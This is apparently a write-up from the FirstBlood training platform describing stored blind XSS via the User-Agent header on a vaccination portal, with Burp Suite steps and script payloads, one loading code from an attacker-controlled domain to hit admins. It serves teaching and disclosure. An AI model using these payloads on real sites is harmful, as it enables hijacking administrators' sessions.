FirstBlood-#726 — [COLLAB with isitbug] Blind XSS through User-Agent header on Vaccination Management portal affecting admins
This issue was discovered on FirstBlood v2
On 2021-10-27, shreky Level 5 reported:
In the Vaccination Management portal,there's information about users who submitted their vaccination proof,from which includes their User-Agent.We can make use of this to exploit a Blind XSS which will hit our XSShunter.com once an admin accesses the dashboard.
However we can also make this XSS not so blind by just injecting for example
<script>alert(document.domain)</script>in our User-Agent when uploading a vaccination proof.It will then trigger upon accessing
/vaccination-manager/portal.phpwhile being logged in.
Steps to reproduce
- Inside Burp Suite's match & replace function,in the match section put your User-Agent's value and
""><script src=yourdomain></script>in the replace section
- Go to
/vaccination-manager/pub/upload-vaccination-proof.phpand upload your proof and submit it
- Login to the Vaccination Management over at
- Once you access the dashboard,check your XSSHunter tab.
Not so blind way
- Same as the blind version but injecting
<script>alert(document.domain)</script>in our User-Agent when uploading our vaxxination proof.
Blind XSS that triggers once an admin accesses the Vaccination Management portal/dashboard/panel.
(Blind way) XSSHunter tab -->
(Not so blind way)XSS Triggering -->
FirstBlood ID: 29
Vulnerability Type: Stored XSS
When uploading a vaccine proof it is possible to achieve stored XSS against admins set via the user agent. As this value typically can't be user controlled the developers did not think it was 'worth' preventing against XSS.